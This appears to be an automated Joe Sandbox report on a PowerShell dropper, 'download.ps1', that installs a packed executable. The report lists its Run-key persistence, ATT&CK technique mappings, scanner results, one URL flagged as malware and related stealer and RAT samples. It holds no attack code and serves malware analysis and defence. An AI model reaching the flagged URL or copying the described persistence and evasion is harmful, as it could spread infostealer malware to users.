Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\platforms\qwebgl.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\platforms\qwindows.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 4_2_00007FF7124FD010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 4_2_00007FF712515C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation

Stealing of Sensitive Information

Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe File opened: \\Mac\shared\projects\loader\src\dropper\src\tmp\_main.py
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 Registry Run Keys / Startup Folder | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | 1 Archive Collected Data | 12 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Registry Run Keys / Startup Folder | 31 Virtualization/Sandbox Evasion | LSASS Memory | 2 System Time Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Native API | Logon Script (Windows) | 1 DLL Side-Loading | 11 Process Injection | Security Account Manager | 31 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 1 PowerShell | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 31 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 Software Packing | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Timestomp | DCSync | 3 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 32 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
[Behavior graph. ID: 1570493, Sample: download.ps1, Startdate: 07/12/2024, Architecture: WINDOWS, Score: 68]

Source | Detection | Scanner | Label | Link
download.ps1 | 8% | ReversingLabs | Script-PowerShell.Trojan.Powdow |
download.ps1 | 6% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\MSVCP140.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\MSVCP140_1.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Core.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5DBus.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Gui.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Network.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Qml.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5QmlModels.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Quick.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Svg.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5WebSockets.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Widgets.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\VCRUNTIME140.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\VCRUNTIME140_1.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\d3dcompiler_47.dll | 3% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\libEGL.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\libGLESv2.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\opengl32sw.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\iconengines\qsvgicon.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qgif.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qicns.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qico.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qjpeg.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qsvg.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qtga.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qtiff.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qwbmp.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qwebp.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platforms\qminimal.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platforms\qoffscreen.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platforms\qwebgl.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platforms\qwindows.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\QtCore.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\QtGui.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\QtWidgets.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\sip.cp313-win_amd64.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\VCRUNTIME140.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\VCRUNTIME140_1.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\_bz2.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\_ctypes.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\_decimal.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\_hashlib.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\_lzma.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\_queue.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\_socket.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\_ssl.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\_wmi.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\charset_normalizer\md.cp313-win_amd64.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\charset_normalizer\md__mypyc.cp313-win_amd64.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\libcrypto-3.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\libffi-8.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\libssl-3.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\psutil\_psutil_windows.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\python3.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\python313.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\select.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\unicodedata.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\MSVCP140.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\MSVCP140_1.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Core.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5DBus.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Gui.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Network.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Qml.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5QmlModels.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Quick.dll | 0% | ReversingLabs
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://repository.swisssign.com/i | 0% | Avira URL Cloud | safe
http://www.color.org) | 0% | Avira URL Cloud | safe
http://.../back.j( | 0% | Avira URL Cloud | safe
http://hkinuxb3bz.top/1.php?s=527 | 100% | Avira URL Cloud | malware
http://ocsp.accv.esSQ8 | 0% | Avira URL Cloud | safe
http://cacerts.digi | 0% | Avira URL Cloud | safe
http://www.aiim.org/pdfa/ns/id/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
nodejs.org | 104.20.23.46 | true | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                      http://crl.securetrust.com/SGCA.crlcheck.exe, 00000005.00000002.2737420337.0000029FD9ABB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://.../back.jpegcheck.exe, 00000005.00000002.2738851397.0000029FD9F30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://tools.ietf.org/html/rfc7231#section-4.3.6)check.exe, 00000005.00000003.2279631020.0000029FD986E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2279030920.0000029FD98B8000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282278745.0000029FD98B2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2283352961.0000029FD986E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2280765304.0000029FD986E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2280765304.0000029FD98B8000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2279030920.0000029FD98A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://httpbin.org/postcheck.exe, 00000005.00000002.2736668202.0000029FD93C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourcecheck.exe, 00000005.00000002.2736121313.0000029FD8F04000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://github.com/Ousret/charset_normalizercheck.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282278745.0000029FD9A01000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://www.firmaprofesional.com/cps0check.exe, 00000005.00000002.2739408419.0000029FDA190000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_speccheck.exe, 00000005.00000002.2736121313.0000029FD8E80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://github.com/urllib3/urllib3/issues/2920check.exe, 00000005.00000002.2738633963.0000029FD9E10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://crl.securetrust.com/SGCA.crl0check.exe, 00000005.00000002.2736668202.0000029FD947E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_datacheck.exe, 00000005.00000002.2735970218.0000029FD7678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://yahoo.com/check.exe, 00000005.00000003.2283352961.0000029FD97FB000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2319400919.0000029FD9955000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9955000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2283651155.0000029FD9955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://crl.securetrust.com/STCA.crl0check.exe, 00000005.00000002.2736668202.0000029FD947E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6check.exe, 00000005.00000003.2283352961.0000029FD97FB000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://html.spec.whatwg.org/multipage/check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282278745.0000029FD9A01000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://www.quovadisglobal.com/cps0check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crlcheck.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningscheck.exe, 00000005.00000002.2738402783.0000029FD9D00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.rfc-editor.org/rfc/rfc8259#section-8.1check.exe, 00000005.00000002.2736668202.0000029FD947E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://requests.readthedocs.iocheck.exe, 00000005.00000002.2739097916.0000029FDA0E4000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2736668202.0000029FD93C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://repository.swisssign.com/check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://crl.xrampsecurity.com/XGCA.crlcheck.exe, 00000005.00000002.2737420337.0000029FD9ABB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://github.com/urllib3/urllib3/issues/2920pcheck.exe, 00000005.00000002.2738633963.0000029FD9E10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.python.orgcheck.exe, 00000005.00000002.2736668202.0000029FD93C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282278745.0000029FD9A01000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://www.accv.es/legislacion_c.htm0Ucheck.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://www.aiim.org/pdfa/ns/id/check.exe, 00000005.00000002.2743333905.00007FF89DF9A000.00000002.00000001.01000000.00000024.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            http://ocsp.accv.es0check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.python.org/check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282239891.0000029FD9AB0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282278745.0000029FD9A01000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2283651155.0000029FD9A60000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282278745.0000029FD9A60000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2312815285.0000029FD9A61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://json.orgcheck.exe, 00000005.00000003.2314207522.0000029FD959B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://docs.python.org/3/howto/mro.html.check.exe, 00000005.00000002.2736560958.0000029FD92C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_packagecheck.exe, 00000005.00000002.2736121313.0000029FD8E80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://twitter.com/check.exe, 00000005.00000003.2283352961.0000029FD97FB000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://stackoverflow.com/questions/4457745#4457745.check.exe, 00000005.00000002.2739551780.0000029FDA1E8000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2740761730.0000029FDA960000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://www.quovadisglobal.com/cpscheck.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_modulecheck.exe, 00000005.00000002.2736121313.0000029FD8F04000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
IP | Domain | Country | ASN | ASN Name | Malicious
104.20.23.46 | nodejs.org | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1570493
Start date and time:2024-12-07 06:44:08 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 13m 17s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:28
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:download.ps1
Detection:MAL
Classification:mal68.spyw.evad.winPS1@30/433@1/1
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 59%
• Number of executed functions: 64
• Number of non-executed functions: 400
Cookbook Comments:
• Found application associated with file extension: .ps1
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 104.208.16.94
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
• Execution Graph export aborted for target check.exe, PID 3608 because there are no executed function
• Execution Graph export aborted for target check.exe, PID 5300 because there are no executed function
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
00:45:10 | API Interceptor | 36x Sleep call for process: powershell.exe modified
00:45:27 | API Interceptor | 3x Sleep call for process: check.exe modified
00:45:28 | API Interceptor | 3x Sleep call for process: WMIC.exe modified
00:46:03 | API Interceptor | 3x Sleep call for process: WerFault.exe modified
06:45:17 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
06:45:26 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
Match: 104.20.23.46
Associated Sample Name / URL | Detection | Threat Name
check.exe | malicious | Unknown
az10.exe | malicious | Unknown
bootstraper.exe | malicious | Unknown
bootstraper.exe | malicious | Unknown
KKjubdmzCR.exe | malicious | DCRat, PureLog Stealer, zgRAT
AYUGPPBj0x.exe | malicious | DCRat
SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | malicious | Blank Grabber
oIDX88LpSs.exe | malicious | XWorm
8svMXMXNRn.exe | malicious | NoCry, XWorm
SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exe | malicious | Unknown
Match: nodejs.org
Associated Sample Name / URL | Detection | Threat Name | Context
check.exe | malicious | Unknown | 104.20.23.46
check.exe | malicious | Unknown | 104.20.22.46
az10.exe | malicious | Unknown | 104.20.23.46
sDKRz09zM7.exe | malicious | AsyncRAT, XWorm | 104.20.22.46
kwlYObMOSn.exe | malicious | XWorm | 104.20.22.46
bootstraper.exe | malicious | Unknown | 104.20.23.46
bootstraper.exe | malicious | Unknown | 104.20.23.46
8Hd0ZExgJz.exe | malicious | Blank Grabber, Umbral Stealer, XWorm | 104.20.22.46
KKjubdmzCR.exe | malicious | DCRat, PureLog Stealer, zgRAT | 104.20.23.46
AYUGPPBj0x.exe | malicious | DCRat | 104.20.23.46
Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | LummaC Stealer | 172.67.165.166
file.exe | malicious | LummaC Stealer | 104.21.16.9
Overdue_payment.pdf.exe | malicious | AgentTesla | 172.67.74.152
file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 104.21.16.9
file.exe | malicious | LummaC Stealer | 104.21.16.9
https://m.frownpasture.top/xqbgOoR7LyCdyD4DEHLii/a8f4AAdjCXhECXlkXzJZXUg0VwwMXxcvBW8NcRstA0McXyNaQkY?_t=1733539511823# | malicious | Unknown | 172.67.216.178
file.exe | malicious | LummaC Stealer | 104.21.16.9
file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 172.67.165.166
file.exe | malicious | LummaC Stealer | 172.67.165.166
Fw 2025 Employee Handbook For all Colhca Employees Ref THEFUE.eml | malicious | Unknown | 162.159.61.3
No context
Match: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\MSVCP140.dll
Associated Sample Name / URL | Detection | Threat Name
check.exe | malicious | Unknown
check.exe | malicious | Unknown
az10.exe | malicious | Unknown
Update_4112024.exe | malicious | Unknown
Update_4112024.exe | malicious | Unknown
PyQtScrcpy.exe | malicious | Unknown
PyQtScrcpy.exe | malicious | Unknown
active.exe | malicious | Unknown
PumpBotPremium.msi | malicious | Python Stealer
Bypass Apk.exe | malicious | Unknown
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
